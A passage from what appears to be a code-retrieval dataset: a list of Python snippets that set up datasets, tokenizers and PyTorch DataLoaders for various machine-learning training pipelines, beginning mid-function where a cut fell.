train_data.filtered_sorted(sort_key=\"duration\")\n # when sorting do not shuffle in dataloader ! otherwise is pointless\n hparams[\"train_dataloader_opts\"][\"shuffle\"] = False\n\n elif hparams[\"sorting\"] == \"descending\":\n train_data = train_data.filtered_sorted(\n sort_key=\"duration\", reverse=True)\n # when sorting do not shuffle in dataloader ! otherwise is pointless\n hparams[\"train_dataloader_opts\"][\"shuffle\"] = False\n\n elif hparams[\"sorting\"] == \"random\":\n pass\n\n else:\n raise NotImplementedError(\n \"sorting must be random, ascending or descending\")\n\n valid_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"valid_data\"],\n replacements={\"data_root\": data_folder}, )\n valid_data = valid_data.filtered_sorted(sort_key=\"duration\")\n\n test_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"test_data\"],\n replacements={\"data_root\": data_folder}, )\n test_data = test_data.filtered_sorted(sort_key=\"duration\")\n\n datasets = [train_data, valid_data, test_data]\n\n # Defining tokenizer and loading it\n tokenizer = transformers.BertTokenizer.from_pretrained('bert-base-chinese')\n\n # 2. Define audio pipeline:\n @data_pipeline.takes(\"wav\")\n @data_pipeline.provides(\"sig\")\n def audio_pipeline(wav):\n sig = dataio.read_audio(wav)\n return sig\n\n dataset.add_dynamic_item(datasets, audio_pipeline)\n\n # 3. Define text pipeline:\n @data_pipeline.takes(\"transcript\")\n @data_pipeline.provides(\"wrd\", \"tokens_list\", \"tokens\")\n def text_pipeline(wrd):\n wrd = \"\".join(wrd.split(\" \"))\n yield wrd\n tokens_list = tokenizer(wrd)[\"input_ids\"]\n yield tokens_list\n tokens = numpy.array(tokens_list, dtype=\"int64\")\n yield tokens\n\n dataset.add_dynamic_item(datasets, text_pipeline)\n\n # 4. Set output:\n dataset.set_output_keys(\n datasets,\n [\"id\", \"sig\", \"wrd\", \"tokens\"], )\n\n # 5. 
If Dynamic Batching is used, we instantiate the needed samplers.\n train_batch_sampler = None\n valid_batch_sampler = None\n if hparams[\"dynamic_batching\"]:\n from sampler import DynamicBatchSampler # noqa\n\n dynamic_hparams = hparams[\"dynamic_batch_sampler\"]\n num_buckets = dynamic_hparams[\"num_buckets\"]\n\n train_batch_sampler = DynamicBatchSampler(\n train_data,\n dynamic_hparams[\"max_batch_len\"],\n num_buckets=num_buckets,\n length_func=lambda x: x[\"duration\"],\n shuffle=dynamic_hparams[\"shuffle_ex\"],\n batch_ordering=dynamic_hparams[\"batch_ordering\"], )\n\n valid_batch_sampler = DynamicBatchSampler(\n valid_data,\n dynamic_hparams[\"max_batch_len\"],\n num_buckets=num_buckets,\n length_func=lambda x: x[\"duration\"],\n shuffle=dynamic_hparams[\"shuffle_ex\"],\n batch_ordering=dynamic_hparams[\"batch_ordering\"], )\n\n return (train_data, valid_data, test_data, tokenizer, train_batch_sampler,\n valid_batch_sampler, )", "def init_data(dataset_config: dict):\n # train and dev will be in random order, test may be ordered according to labels\n if dataset_config[\"name\"] == \"CoLA\":\n train, dev, test, num_classes = load_cola(dataset_config)\n elif dataset_config[\"name\"] == \"AGNews\":\n train, dev, test, num_classes = load_ag_news(dataset_config)\n elif dataset_config[\"name\"] == \"DBPedia\":\n train, dev, test, num_classes = load_dbpedia(dataset_config)\n elif dataset_config[\"name\"] == \"YRF\":\n train, dev, test, num_classes = load_yrf(dataset_config)\n else:\n raise NameError(f\"Dataset {dataset_config['name']} not implemented.\")\n # etc.\n\n # shrink size if debugging\n if dataset_config[\"debug\"]:\n # choose a random subset using huggingface select function\n train = train.select(random.sample(range(len(train)), k=200))\n dev = dev.select(random.sample(range(len(dev)), k=40))\n test = test.select(random.sample(range(len(test)), k=200))\n\n # create class imbalance\n random.seed(dataset_config[\"seed\"])\n if dataset_config[\"pool_balance\"] == \"balanced\":\n pass\n elif dataset_config[\"pool_balance\"] == \"imbalanced\":\n train = train.filter(lambda example: create_imbalanced_dataset(example, dataset_config[\"imbalance_prop\"], dataset_config['imbalance_cls']))\n else:\n NameError(f\"pool_balance = {dataset_config['pool_balance']} not allowed\")\n\n if dataset_config[\"dev_balance\"] == \"balanced\":\n pass\n elif dataset_config[\"dev_balance\"] == \"imbalanced\":\n dev = dev.filter(lambda example: create_imbalanced_dataset(example, dataset_config[\"imbalance_prop\"], dataset_config['imbalance_cls']))\n else:\n NameError(f\"dev_balance = {dataset_config['dev_balance']} not allowed\")\n\n # get seed labelled pool indices (using the same seed data every time)\n random.seed(dataset_config[\"seed\"])\n if dataset_config[\"seed_balance\"] == \"balanced\":\n # this is random (will have some variance vs pool)\n indices = list(range(len(train)))\n unlabelled_pool_idx, labelled_pool_idx = split(\n indices,\n random_state=dataset_config[\"seed\"],\n test_size=dataset_config[\"seed_size\"]\n )\n elif dataset_config[\"seed_balance\"] == \"stratified\":\n # this is the same as the underlying train set (which may be unbalanced)\n indices = list(range(len(train)))\n unlabelled_pool_idx, labelled_pool_idx = split(\n indices,\n random_state=dataset_config[\"seed\"],\n test_size=dataset_config[\"seed_size\"],\n stratify=train['label']\n )\n elif dataset_config[\"seed_balance\"] == \"imbalanced\":\n # artificially sample an imbalanced seed set from the pool\n 
unlabelled_pool_idx, labelled_pool_idx = create_imbalanced_seed(\n train,\n num_classes,\n dataset_config[\"seed_size\"],\n dataset_config['imbalance_prop'],\n dataset_config['imbalance_cls']\n )\n else:\n raise NameError(f\"seed_balance = {dataset_config['seed_balance']} not allowed\")\n\n return train, dev, test, num_classes, labelled_pool_idx, unlabelled_pool_idx", "def InitDataset(self):\n train_txt = 'ImageSets/Main/train.txt'\n val_txt = 'ImageSets/Main/val.txt'\n annotations = \"Annotations\"\n jpegimages = \"JPEGImages\"\n images_path = train_txt if (self.is_train) else val_txt \n images_path = readTxt(os.path.join(self.path, images_path))\n images_path.pop(-1)\n # rawdata format: [path_2_image, path_2_xml]\n rawData = list()\n for each in images_path:\n xml = os.path.join(self.path, annotations, each + '.xml')\n jpeg = os.path.join(self.path, jpegimages, each + '.jpg')\n rawData.append([jpeg, xml])\n return rawData", "def test_init(self, epochs):\n i = -1\n for p in self.P:\n for subband in self.SUBBANDS:\n i += 1\n\n # --- load model ----\n pref = self.model_dir + \"/\" + self.name % (subband, p)\n model = copy.deepcopy(self.model)\n model.model.load_weights(pref + \"_epochs_%d\" % epochs[i])\n self.NET.append(model)\n # --- end load model ----\n\n # --- load permutation ----\n self.permutation.append(\n np.load(self.model_dir + \"/permutation_\" + self.name %\n (subband, p) + \".npy\"))\n # --- end load permutation ----", "def reInitAndRun(self):\n self.playlists = self.readPlaylistData()\n self.audioDF = self.readAudioData(shouldProcess=True)\n self.clusterLabels = []\n self.models = Clusterers(k=len(self.playlists))\n self.processAndCluster()\n self.analyzeResults()", "def setup(self):\n # TODO check if need both dataset together\n self.train_dataset = ABSADataset(data_path=self.train_path, mode=self.in_mode, task=self.task, \n tokenizer=self.tokenizer, vocab=\"bert\")\n self.vocabulary = self.train_dataset.vocabulary\n\n self.eval_dataset = ABSADataset(data_path=self.dev_path, mode=self.in_mode, task=self.task,\n tokenizer=self.tokenizer, vocab=self.vocabulary)\n #self.train_restaurant = ABSADataset(data_path=RESTAURANT_TRAIN)\n #self.eval_restaurant = ABSADataset(data_path=RESTAURANT_DEV)", "def prepare_data_loaders_without_shuffle(batch_size=32, hier=False, elmo=False, elmo_pre=None, use_elmo_pre=False, deepmoji=False, dev_with_label=False, include_test=False):\n train_data_loaders = []\n val_data_loaders = []\n test_data_loaders = []\n\n vocab = generate_vocab(deepmoji)\n train, val, test, _ = prepare_data(batch_size=batch_size, hier=hier, elmo=elmo, elmo_pre=elmo_pre, use_elmo_pre=use_elmo_pre, deepmoji=deepmoji, is_shuffle=False, vocab=vocab, dev_with_label=dev_with_label, include_test=include_test)\n\n return train, val, test, vocab", "def prepare_data_loaders(num_split, batch_size=32, hier=False, elmo=False, elmo_pre=None, use_elmo_pre=False, deepmoji=False, dev_with_label=False, include_test=False):\n train_data_loaders = []\n val_data_loaders = []\n test_data_loaders = []\n\n vocab = generate_vocab(deepmoji)\n for i in range(num_split):\n train, val, test, _ = prepare_data(batch_size=batch_size, hier=hier, elmo=elmo, elmo_pre=elmo_pre, use_elmo_pre=use_elmo_pre, deepmoji=deepmoji, is_shuffle=True, random_state=i, vocab=vocab, dev_with_label=dev_with_label, include_test=include_test)\n train_data_loaders.append(train)\n val_data_loaders.append(val)\n test_data_loaders.append(test)\n\n return train_data_loaders, val_data_loaders, test_data_loaders, vocab", "def 
prepare_data(self, *args, **kwargs):\n # get paths to train and test splits\n _split_paths = [os.path.join(self.path_to_data, split)\n for split in os.listdir(self.path_to_data)]\n\n # for each split [train, test]\n for _path in _split_paths:\n _img_classes = os.listdir(_path) # get subfolders representing each class\n self.splits[os.path.basename(_path)] = []\n\n # get the images in pairs with its corresponding class\n for _class in _img_classes:\n _data = self.get_img_text_pair(os.path.join(_path, _class))\n\n if os.path.basename(_path) == 'train':\n self.weights[self.encode_label(_class)] = len(_data)\n self.splits[os.path.basename(_path)].extend(_data)", "def prepare_data(self):\n # Set up the path\n self.path_target_train = os.path.join(self.data_dir, self.train_path_file_target + \".pkl\")\n self.path_target_test = os.path.join(self.data_dir, self.test_path_file_target + \".pkl\")\n\n if not os.path.exists(self.path_target_train) or not os.path.exists(self.path_target_test):\n # Create vocabularies of the appropriate sizes.\n self.create_vocabulary(self.train_path_file)\n\n # Create token ids for the training data.\n input_train_path = self.train_path_file\n target_train_path = self.train_path_file_target\n train_input, train_input_length, train_labels = self.data_to_token_ids(input_train_path, target_train_path)\n\n # Create token ids for the validation data.\n input_test_path = self.test_path_file\n target_test_path = self.test_path_file_target\n test_input, test_input_length, _ = self.data_to_token_ids(input_test_path, target_test_path, train=False)\n\n # Collect data into a list\n training_data = [train_input, train_input_length, train_labels]\n test_data = [test_input, test_input_length]\n\n # Save all the data\n with open(self.path_target_train, 'wb') as f:\n pickle.dump(training_data,f)\n with open(self.path_target_test, 'wb') as f:\n pickle.dump(test_data, f)\n else:\n # Load data\n with open(self.path_target_train, 'rb') as f:\n training_data = pickle.load(f)\n with open(self.path_target_test, 'rb') as f:\n test_data = pickle.load(f)\n\n # Initialize vocabulary\n self.initialize_vocabulary()\n\n # Convert list into a numpy array - train data\n train_input = pd.DataFrame(training_data[0]).fillna(value=0).astype(int).values\n train_length_input = np.array(training_data[1], dtype=int)\n train_labels = np.array(training_data[2], dtype=int)\n\n # Convert list into a numpy array - test data\n test_input = pd.DataFrame(test_data[0]).fillna(value=0).astype(int).values\n test_length_input = pd.DataFrame(test_data[1]).fillna(value=0).astype(int).values\n\n # Printing maximum length\n print(\"Shape of the input training matrix {}\".format(str(train_input.shape)))\n print(\"Shape of the input test matrix {}\".format(str(test_input.shape)))\n\n # Copy the files\n self.copy_files()\n\n # Return output\n return train_input, train_length_input, train_labels, test_input, test_length_input", "def train_dataloader(self) -> torch.utils.data.DataLoader: \n return torch.utils.data.DataLoader(self.dataset_train, **self.dl_kwargs)", "def dataloaders():\n # train data path\n data_train = '../dataset/train/'\n # set transformations\n train_transforms = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n \n train_data = datasets.ImageFolder(data_train, transform = train_transforms)\n trainloader = torch.utils.data.DataLoader(train_data, batch_size = 16, shuffle = True)\n \n return trainloader", "def 
__init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)", "def _init_loaders(self):\n @self.loaders_wrapper(\"nx2nx\")\n def get_nx2nx_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.nx2nx_loader(extractor, stream, transformers,\n self.loader_json[self.loader_name],\n graph)\n\n @self.loaders_wrapper(\"neo4j2nx\")\n def get_neo4j2nx_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.neo4j2nx_loader(extractor, stream, transformers,\n self.loader_json[self.loader_name],\n graph)\n\n\n @self.loaders_wrapper(\"neo4j2edgelist\")\n def get_neo4j2edgelist_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.neo4j2edgelist_loader(\n extractor,\n stream,\n transformers,\n self.loader_json[self.loader_name],\n graph\n )\n\n\n @self.loaders_wrapper(\"edgelist2neo4j\")\n def get_edgelist2neo4j_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.edgelist2neo4j_loader(\n extractor,\n stream,\n transformers,\n self.loader_json[self.loader_name],\n graph\n )", "def init_dataset(validation_dataset_name):\n transform = transforms.Compose([transforms.ToPILImage(),transforms.ToTensor(),transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n \n if validation_dataset_name == 'datasetRAP':\n # validation = 8317 images = 166 batches of 50 images + 1 batch of 17 images\n dataset_valid = loader_rapdataset_yiqiang.RAPDataset(0,False,'/storage/Datasets/Rap-PedestrianAttributeRecognition/',transform)\n labels = loader_rapdataset_yiqiang.ATTRIBUTES\n datset_attr_nbr = 92\n elif validation_dataset_name == 'datasetPETA':\n dataset_valid = loader_peta_dataset.PETADataset(False, '/storage/Datasets/PETA-PEdesTrianAttribute', transform)\n labels = loader_peta_dataset.ATTRIBUTES\n datset_attr_nbr = 104\n elif validation_dataset_name == 'datasetRAPPETA':\n dataset_valid = loader_rap_plus_peta_dataset.RAPPlusPETADataset(False, '/storage/Datasets/Rap-PedestrianAttributeRecognition/', '/storage/Datasets/PETA-PEdesTrianAttribute', transform)\n labels = [peta_label for rap_label,peta_label in loader_rap_plus_peta_dataset.ATTRIBUTES]\n datset_attr_nbr = 49\n\n print (\"Dataset valid size :\", dataset_valid.__len__())\n print (\"Dataset Attributes number :\", datset_attr_nbr)\n assert (len(labels) == datset_attr_nbr)\n\n dataloader_valid = DataLoader(dataset_valid, batch_size=Param_Batchsize, shuffle=True, num_workers=Param_Nb_Workers)\n\n return dataloader_valid, dataset_valid", "def __init__(self, args):\n self.train_img_file = os.path.join(args.data_dir, args.train_img_file)\n self.train_lbl_file = os.path.join(args.data_dir, args.train_lbl_file)\n self.test_img_file = os.path.join(args.data_dir, args.test_img_file)\n self.test_lbl_file = os.path.join(args.data_dir, args.test_lbl_file)\n self.batch_size = args.batch_size\n self.num_workers = args.data_workders\n self.shuffle = True\n self.dataset_name = args.dataset_name\n self.pin_memory = False #args.cuda\n\n # check dataset files exist\n files = 
[self.train_img_file, self.train_lbl_file,\n self.test_img_file, self.test_lbl_file]\n for file in files:\n if not os.path.isfile(file):\n msg = \"Data file not found. Please check the path \" +\\\n \"or download files using scripts/download_files.py \"\n raise IOError(msg)", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)\n \n self._results_ = None", "def prepare_data():\n user_name = os.environ.get('USER')\n traintest_corpus = ResumeCorpus('/Users/' + user_name + '/Documents/Data')\n random.shuffle(traintest_corpus.resumes)\n\n for resume in traintest_corpus.resumes:\n try:\n review_text = pre_processing(resume[0])\n review_text = \" \".join(review_text)\n data_dict['data'].append(review_text)\n data_dict['label'].append(resume[1])\n except:\n pass", "def build_data_loader(txt_path, in_vocab_path, out_vocab_path,\n batch_size=1, drop_last=False, num_workers=0):\n dataset = PuncDataset(txt_path, in_vocab_path, out_vocab_path)\n batch_sampler = RandomBucketBatchSampler(dataset,\n batch_size=batch_size,\n drop_last=drop_last)\n collate_fn = TextAudioCollate()\n data_loader = DataLoader(dataset, batch_sampler=batch_sampler,\n collate_fn=collate_fn, num_workers=num_workers)\n return data_loader", "def prep_base(self):\n\n self.config.logger.info(\"Preparing base layer land use data...\")\n\n # set start time\n t0 = time.time()\n\n # extract and process base layer land cover data\n base_data = rdr.read_base(self.config, self.observed_landclasses, self.sequence_metric_dict,\n metric_seq=self.metric_sequence_list, region_seq=self.region_sequence_list)\n\n # unpack variables\n self.spat_ludata, self.spat_water, self.spat_coords, self.spat_aez_region, self.spat_grid_id, self.spat_aez, \\\n self.spat_region, self.ngrids, self.cellarea, self.celltrunk, self.sequence_metric_dict = base_data\n\n self.config.logger.info('PERFORMANCE: Base spatial landuse data prepared in {0} seconds'.format(time.time() - t0))", "def create_train_dataloader(configs):\n train_lidar_aug = OneOf([\n Random_Rotation(limit_angle=np.pi / 4, p=1.0),\n Random_Scaling(scaling_range=(0.95, 1.05), p=1.0),\n ], p=0.66)\n train_dataset = KittiDataset(configs, mode='train', lidar_aug=train_lidar_aug, hflip_prob=configs.hflip_prob,\n num_samples=configs.num_samples)\n train_sampler = None\n if configs.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\n train_dataloader = DataLoader(train_dataset, batch_size=configs.batch_size, shuffle=(train_sampler is None),\n pin_memory=configs.pin_memory, num_workers=configs.num_workers, sampler=train_sampler)\n\n return train_dataloader, train_sampler", "def _custom_data_loader(self) -> DataLoader:\n dataloaders = DataLoader(self.dataset, batch_size=1)\n return dataloaders", "def setup(self):\n in_dataset, out_dataset = self.get_datasets()", "def setup(self):\n in_dataset, out_dataset = self.get_datasets()", "def data_loaders(dataset_path):\n dataset_path = dataset_path\n news_stock_dataset = NewsStockDataLoader(dataset_path)\n \n dataset_size = len(news_stock_dataset)\n indices = list(range(dataset_size))\n training_split = int(0.8 * dataset_size)\n validation_split = int(0.9 * dataset_size)\n\n np.random.seed(96)\n np.random.shuffle(indices)\n\n train_indices = indices[:training_split]\n valid_indices = indices[training_split:validation_split]\n test_indices = indices[validation_split:]\n\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(valid_indices)\n test_sampler = 
SubsetRandomSampler(test_indices)\n \n collate = PadSequence()\n\n training_loader = DataLoader(news_stock_dataset,\n num_workers = 1,\n batch_size = Config.get(\"training_batch_size\"),\n sampler = train_sampler,\n collate_fn = collate)\n\n validation_loader = DataLoader(news_stock_dataset,\n num_workers = 1,\n batch_size = Config.get(\"validation_batch_size\"),\n sampler = valid_sampler,\n collate_fn = collate)\n\n testing_loader = DataLoader(news_stock_dataset,\n num_workers = 1,\n batch_size = Config.get(\"testing_batch_size\"),\n sampler= test_sampler,\n collate_fn = collate)\n \n return training_loader, validation_loader, testing_loader", "def prepare_data(self):\n import subprocess\n # Download coco data set into dir specified by config then /data/coco\n subprocess.call([f\"{get_original_cwd()}/bin/fetch_dataset.sh\", f\"{self.dir}/data/coco\", f\"{get_original_cwd()}\"])\n # subprocess.call([f\"bin/fetch_dataset.sh\", f\"{self.dir}/data/coco\"])\n task = \"instances\" if self.instance else \"person_keypoints\"\n register_coco_instances(\"train\", {}, f\"{self.dir}/data/coco/{task}_train2014.json\",\n f\"{self.dir}/data/coco/train2014\")\n register_coco_instances(\"val\", {}, f\"{self.dir}/data/coco/{task}_minival2014.json\",\n f\"{self.dir}/data/coco/val2014\")\n register_coco_instances(\"test\", {}, f\"{self.dir}/data/coco/{task}_valminusminival2014.json\",\n f\"{self.dir}/data/coco/val2014\")", "def __initDataFromImages(self):\n #Check if the local_db exist\n initial_dirs = os.listdir(os.getcwd())\n is_db_empty = False\n if len(os.listdir(self.base_dir)) == 1: #Empty here means no person data\n [images_dir] = os.listdir(self.base_dir)\n is_db_empty = images_dir == cfg.local[\"IMG_DIR\"]\n if cfg.local[\"DEFAULT_IMGS_DIR\"] in initial_dirs and is_db_empty:\n default_path = os.path.join(os.getcwd(), cfg.local[\"DEFAULT_IMGS_DIR\"])\n self.X, self.y = loadDataFromImagesPath(self.detector, default_path)\n self.le = LabelEncoder()\n #Nothing relate to mapping name to dir here, we don't care about\n #This data because of the user doesn't exist in the database\n self.__savePreProcessedData()", "def _load_training_data(self):\n self._save_training_data()", "def init_batch(self):\n pass", "def build_data_set(self):\n if not self.assert_data_correct():\n self.download_all_data()\n self.unpack_rename_data()\n self.split_data_characters()\n self.clean_data_fragments()\n self.create_font_data()\n if not self.assert_train_augmented():\n self.augment_train_data()\n if not self.assert_style_data_correct():\n self.download_style_data()\n self.unpack_rename_data()", "def _make_data(self):\n pdf_datasets_all = make_pdf_datasets(self.pdf_list, self.xlims, self.ylims, self.tlims, self.dims, 9)\n self.pdf_dataset = np.concatenate(pdf_datasets_all, axis = 0)\n self.PDE_dataset = make_PDE_dataset(self.num_collocation, self.xlims, self.ylims, self.tlims, self.dims)\n self.BC_dataset = make_BC_dataset(self.num_BC, self.xlims, self.ylims, self.tlims, self.dims)", "def init(self, **kwargs):\n self._d = {}\n self._th = None\n self._run = True\n self.load()", "def data_loaders(args):\n\n transform = transforms.Compose([\n transforms.Resize(64),\n transforms.ToTensor(),\n lambda image: (image - 0.5) * 2\n ])\n\n train_mnist = datasets.MNIST(\n root=args.database_root,\n train=True,\n download=True,\n transform=transform\n )\n train_loader = DataLoader(\n dataset=train_mnist,\n batch_size=args.train_batch_size,\n shuffle=True,\n num_workers=1,\n pin_memory=True\n )\n\n test_mnist = datasets.MNIST(\n 
root=args.database_root,\n train=False,\n download=True,\n transform=transform\n )\n test_loader = DataLoader(\n dataset=test_mnist,\n batch_size=args.test_batch_size,\n shuffle=True,\n num_workers=1,\n pin_memory=True\n )\n\n return train_loader, test_loader", "def get_loader(root_folder, batch_size=16, shuffle=False, num_workers=0, pin_memory=False):\n cal101_dset = get_dataset(root_folder) \n\n # train test split \n split_ratio = 0.2 \n dataset_size = len(cal101_dset)\n indices = np.arange(dataset_size)\n np.random.shuffle(indices)\n split = int(np.floor(split_ratio * dataset_size))\n train_indices, val_indices = indices[split:], indices[:split]\n\n train_sampler = data.SubsetRandomSampler(train_indices)\n valid_sampler = data.SubsetRandomSampler(val_indices) \n\n train_loader = data.DataLoader( cal101_dset, batch_size=batch_size, \n shuffle=shuffle,num_workers=num_workers, sampler=train_sampler, pin_memory=pin_memory)\n validation_loader = data.DataLoader(cal101_dset, batch_size=batch_size,\n shuffle=shuffle,num_workers=num_workers, sampler=valid_sampler, pin_memory=pin_memory)\n\n return train_loader, validation_loader", "def __init__(self, data_dir: Path, config: Config):\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\"\n )\n\n training_path_list, ground_truth_path_list = get_file_paths(data_dir)\n\n X_train, X_test, y_train, y_test = self.train_test_split(\n training_path_list,\n ground_truth_path_list,\n test_portion=config.val_split,\n )\n\n train_dataset = TrainDataset(\n config, X_train, y_train, random_augmentation=True\n )\n val_dataset = TrainDataset(\n config, X_test, y_test, random_augmentation=False\n )\n\n self.train_loader = DataLoader(\n train_dataset,\n batch_size=config.train_batch_size,\n shuffle=True,\n pin_memory=True,\n )\n self.val_loader = DataLoader(\n val_dataset,\n batch_size=config.test_batch_size,\n # No shuffle as it won't make any difference\n pin_memory=True,\n )\n\n model = UNet(INPUT_CHANNELS, OUTPUT_CHANNELS, config)\n self.model = DataParallel(model).to(self.device)\n\n if config.loss == \"logit_bce\":\n loss_weight = (\n self._get_loss_weight() if config.balanced_loss else None\n )\n # Using logits directly is numerically more stable and efficient\n self.class_loss_fn = BCEWithLogitsLoss(pos_weight=loss_weight)\n elif config.loss == \"soft_dice\":\n self.class_loss_fn = soft_dice_loss\n\n self.texture_transform = get_texture_transform(config)\n self.shape_loss_fn = ContrastiveLoss(config.temperature)\n\n self.optim = Adam(\n self.model.parameters(),\n lr=config.learn_rate,\n weight_decay=config.weight_decay,\n )\n max_steps = config.epochs * len(self.train_loader)\n self.scheduler = OneCycleLR(\n self.optim,\n max_lr=config.max_learn_rate,\n total_steps=max_steps,\n )\n self.scaler = GradScaler(enabled=config.mixed_precision)\n\n # Used when dumping hyper-params to a file\n self.config = config\n\n # To store best acc achieved so far\n self.best_acc = 0.0", "def setup(self):\n if not os.path.exists(self.save_dir):\n os.mkdir(self.save_dir)\n\n if self.configuration['load_checkpoint'] >= 0:\n last_checkpoint = self.configuration['load_checkpoint']\n else:\n last_checkpoint = -1\n\n if last_checkpoint >= 0:\n # enable restarting training\n self.load_networks(last_checkpoint)\n if self.is_train and self.scheduler != 'plateau':\n self.load_optimizers(last_checkpoint)\n for o in self.optimizers:\n o.param_groups[0]['lr'] = o.param_groups[0]['initial_lr'] # reset learning rate\n\n self.schedulers = 
[get_scheduler(optimizer, self.configuration) for optimizer in self.optimizers]\n\n if last_checkpoint > 0 and self.scheduler != 'plateau':\n for s in self.schedulers:\n for _ in range(last_checkpoint):\n s.step()\n\n self.print_networks()", "def __init__(self, data_config):\n self._brands = self._load_from_directory(data_config['targeted_brands_dir'])\n self._keywords = self._load_from_directory(data_config['keywords_dir'])\n self._fqdn_keywords = self._load_from_directory(data_config['fqdn_keywords_dir'])\n self._similarity_words = self._load_from_directory(data_config['similarity_words_dir'])\n self._tlds = self._load_from_directory(data_config['tld_dir'])", "def get_driving_data_loaders(batch_size, train_dataset, valid_dataset, test_dataset, num_workers=0): \n\n valid_loader = DataLoader(dataset=valid_dataset,\n batch_size=batch_size,\n num_workers=num_workers,\n shuffle=True)\n\n train_loader = DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n num_workers=num_workers,\n drop_last=True, \n shuffle=True)\n\n test_loader = DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n num_workers=num_workers,\n shuffle=False)\n\n return train_loader, valid_loader, test_loader", "def train_dataloader(self) -> DataLoader:\n return self._custom_data_loader()", "def init_assigner_sampler(self):\n self.mask_assigner = []\n self.mask_sampler = []\n if self.train_cfg is not None:\n for idx, rcnn_train_cfg in enumerate(self.train_cfg):\n self.mask_assigner.append(\n build_assigner(rcnn_train_cfg.assigner))\n self.current_stage = idx\n self.mask_sampler.append(\n build_sampler(rcnn_train_cfg.sampler, context=self))", "def prepare_nfold_datasets(self): # i.e. split into different train/ground-truth(test) dataset\n for alpha in range(1, self.ALPHAs+1):\n if alpha != self.ALPHAs:\n gt_years = np.array2string(self.tl_model.years[(alpha-1)*self.PSI : alpha*self.PSI], separator='-')\n else:\n gt_years = np.array2string(self.tl_model.years[(alpha-1)*self.PSI : alpha*self.PSI+self.runoff_years], separator='-')\n new_cluster_dir = str(Path(self.tl_model.cluster_dir) / f'alpha_{alpha}_GT-{gt_years}')\n os.makedirs(new_cluster_dir, exist_ok=True)\n\n new_prepared_data_dir = str(Path(self.tl_model.prepared_data_dir) / f'alpha_{alpha}')\n os.makedirs(new_prepared_data_dir, exist_ok=True)\n \n if utils.find(f'*alpha_{alpha}_preprocessed.pkl', new_prepared_data_dir) and utils.find(f'*alpha_{alpha}_standardized_stacked_arr.pkl', new_prepared_data_dir):\n pass\n else:\n if not utils.find(f'*target*alpha_{alpha}_preprocessed.pkl', new_prepared_data_dir):\n print(f\"=> No input datasets pre-processed for alpha of {alpha}\")\n prepare.cut_target_dataset(self, alpha, new_prepared_data_dir)\n\n if not utils.find(f'*rf*alpha_{alpha}_preprocessed.pkl', new_prepared_data_dir):\n print(f\"=> No rainfall datasets pre-processed for alpha of {alpha}\")\n prepare.cut_rf_dataset(self, alpha, new_prepared_data_dir)\n \n print(f'Preprocessed pickles for alpha split {alpha} can be found @:\\n{new_prepared_data_dir}')", "def init_assigner_sampler(self):\n self.bbox_assigner = []\n self.bbox_sampler = []\n if self.train_cfg is not None:\n for idx, rcnn_train_cfg in enumerate(self.train_cfg):\n self.bbox_assigner.append(\n build_assigner(rcnn_train_cfg.assigner))\n self.current_stage = idx\n self.bbox_sampler.append(\n build_sampler(rcnn_train_cfg.sampler, context=self))", "def prepare_dataset(fpath):\n raise NotImplementedError", "def get_loaders(img_size=CONFIG[\"matrix_size\"], batch_size=CONFIG[\"batch_size\"],\n 
used_keypoints=CONFIG[\"used_keypoints\"], interpolation_frames=CONFIG[\"interpolation_frames\"],\n noise_frames=CONFIG[\"noise_frames\"], all_data=None, all_labels=None):\n\n if all_data is None or all_labels is None:\n all_data, all_labels = load_video_data_labels(interpolation_frames, noise_frames, used_keypoints, img_size)\n\n p = np.random.permutation(len(all_data))\n train_len = int(len(p) / 80)\n others_len = int((len(p) - train_len) / 2)\n\n train_data, train_labels = all_data[p[:train_len]], all_labels[p[:train_len]]\n val_data = all_data[p[train_len:train_len + others_len]]\n val_labels = all_labels[p[train_len:train_len + others_len]]\n test_data, test_labels = all_data[p[-others_len:]], all_labels[p[-others_len:]]\n\n # Transform to tensor\n train_data_tensor, train_labels_tensor = torch.from_numpy(train_data), torch.from_numpy(train_labels)\n val_data_tensor, val_labels_tensor = torch.from_numpy(val_data), torch.from_numpy(val_labels)\n test_data_tensor, test_labels_tensor = torch.from_numpy(test_data), torch.from_numpy(test_labels)\n\n # Data Loader for easy mini-batch return in training, load the Dataset from the numpy arrays\n train_loader = DataLoader(TensorDataset(train_data_tensor, train_labels_tensor), batch_size=batch_size)\n val_loader = DataLoader(TensorDataset(val_data_tensor, val_labels_tensor), batch_size=batch_size)\n test_loader = DataLoader(TensorDataset(test_data_tensor, test_labels_tensor), batch_size=batch_size)\n\n data = {\"train_data\": train_data,\n \"train_labels\": train_labels,\n \"val_data\": val_data,\n \"val_labels\": val_labels,\n \"test_data\": test_data,\n \"test_labels\": test_labels,\n \"all_data\": all_data[p],\n \"all_labels\": all_labels[p]}\n\n return data, train_loader, val_loader, test_loader", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def _load_templates(cls):\n if cls._raw_templates is None:\n cls._raw_templates = fetch_rrlyrae_templates()", "def __init__(self):\n print ('Initializing Data reader object...')\n data_Train_Images, data_Train_Labels, data_Test_Image, data_Test_Labels 